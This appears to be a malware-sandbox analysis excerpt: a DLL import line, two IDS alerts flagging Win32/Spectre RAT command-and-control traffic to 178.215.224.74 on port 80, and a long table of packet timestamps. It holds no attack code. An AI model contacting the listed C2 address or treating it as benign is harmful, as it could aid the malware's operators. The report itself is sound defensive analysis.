                                        VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                        Language of compilation system | Country where language is spoken | Map
                                        English | United States |
                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                        2024-11-21T20:00:35.393060+0100 | 2853767 | ETPRO MALWARE Win32/Spectre RAT CnC Activity M1 | 1 | 192.168.2.4 | 49874 | 178.215.224.74 | 80 | TCP
                                        2024-11-21T20:00:35.393060+0100 | 2853768 | ETPRO MALWARE Win32/SpectreRAT CnC Activity M2 | 1 | 192.168.2.4 | 49874 | 178.215.224.74 | 80 | TCP
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 21, 2024 20:00:15.194693089 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.194736004 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.194803953 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.210246086 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.210505962 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.210586071 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.243072033 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.243108988 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.243211031 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.333956957 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.333988905 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.334131956 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.335526943 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.335647106 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.335692883 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.340989113 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.341098070 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.341150999 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.346685886 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.346757889 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.346807957 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.352010965 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.352114916 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.352174997 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.357470036 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.357575893 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.357626915 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.362895012 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.363159895 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.363213062 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.368350983 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.368467093 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.368520021 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.374003887 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.374146938 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.374200106 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.377644062 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.377795935 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.377841949 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.381557941 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.381690025 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.381762981 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.385329008 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.385493040 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.385546923 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.389130116 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.389288902 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.389333963 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.392924070 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.393065929 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.393114090 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.396778107 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.396897078 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.396943092 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.400580883 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.400682926 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.400734901 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.404341936 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.404467106 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.404511929 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.408158064 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.408312082 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.408413887 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.411969900 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.412130117 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.412177086 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.415767908 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.415918112 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.415967941 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.419514894 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.465672970 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.544312000 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.544435024 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.544477940 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.545185089 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.545310020 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.545346975 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.548283100 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.548367977 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.548409939 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.550649881 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.550704956 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.550746918 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.553685904 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.553746939 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.553788900 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.556603909 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.556684971 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.556720018 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.559688091 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.559741020 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.559773922 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.562668085 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.562803984 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.562844038 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.565783024 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.565886021 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.565920115 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.568739891 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.568847895 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.568888903 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.571866989 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.571923018 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.571959972 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.574863911 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.574898958 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.574942112 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.577819109 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.577893972 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.577939034 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.580884933 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.580960989 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.581002951 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.583918095 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.584028006 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.584072113 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.586872101 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.587002039 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.587119102 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.589967012 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.590080023 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.590173006 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.592911005 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.593009949 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.593055010 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.595973015 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.596003056 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.596040964 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.599061012 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.599117994 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.599153042 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.602041960 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.602118969 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.602171898 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.605058908 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.605150938 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.605214119 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.608191013 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.608288050 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.608411074 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.611130953 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.611193895 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.611241102 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.614171982 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.614233971 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.614291906 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.617110968 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.617213964 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.617257118 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.620181084 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.620285034 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.620325089 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.623188019 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.623275042 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.623327971 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.626257896 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.626358032 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.626399040 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.629251003 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.629362106 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.629399061 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.632276058 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.632364988 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.632399082 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.635415077 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.635458946 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.635509968 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.638360023 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.638427973 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.638475895 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.641385078 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.641424894 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.641460896 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.644439936 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.644504070 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.644537926 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.647420883 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.647478104 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.647625923 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.650578976 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.650665045 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.650715113 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.653496027 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.653547049 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.653598070 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.755353928 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.755449057 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.755511999 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.756879091 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.756941080 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.756984949 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.759073019 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.759177923 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.759224892 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.762144089 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.762267113 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.762320042 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.765038013 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.765156031 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.765196085 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.768126965 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.768208027 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.768244028 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.771169901 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.771306038 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.771339893 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.774127960 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.774281025 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.774365902 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.776640892 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.776742935 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.776774883 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.779198885 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.779274940 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.779316902 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.781719923 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.781851053 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.781886101 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.783919096 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.783988953 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.784023046 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.786060095 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.786124945 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.786163092 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.788203955 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.788326025 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.788372040 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.790350914 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.790519953 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.790565014 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.792507887 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.792608023 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.792644978 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.794677973 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.794765949 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.794800043 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.796791077 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.796894073 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.796931028 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.798986912 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.799113035 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.799146891 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.801120996 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.801275015 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.801316023 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.803308010 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.803369999 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.803411007 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.805470943 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.805493116 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.805531979 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.807580948 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.807704926 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.807739973 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.809725046 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.809855938 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.809887886 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.811882019 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.811997890 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.573807001 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.573852062 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.575743914 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.575901985 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.575952053 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.577696085 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.577763081 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.577805042 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.579819918 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.579957962 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.580008030 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.581904888 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.582051039 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.582102060 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.583916903 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.584602118 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.584748030 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.585975885 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.586107016 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.586153030 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.588263035 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.588439941 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.588486910 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.590327024 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.590486050 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.590532064 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.592191935 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.592268944 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.592312098 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.594372034 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.594526052 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.594578028 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.596323967 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.596515894 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.596568108 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.598421097 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.598611116 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.598664045 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.600399971 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.600434065 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.600480080 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.602516890 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.602535963 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.602575064 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.604644060 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.604805946 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.604860067 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.606801987 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.606818914 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.606873989 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.608583927 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.608717918 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.608788967 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.610780001 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.610925913 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.610971928 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.612775087 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.612958908 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.613069057 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.614696980 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.614787102 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.614950895 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.616728067 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.616993904 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.617059946 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.618782997 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.618932962 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.618978024 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.620785952 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.620913029 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.620956898 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.623068094 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.623115063 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.623174906 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.625091076 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.625236988 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.625610113 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.627260923 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.627365112 CET8049838178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:22.627403975 CET4983880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:22.629448891 CET8049838178.215.224.74192.168.2.4
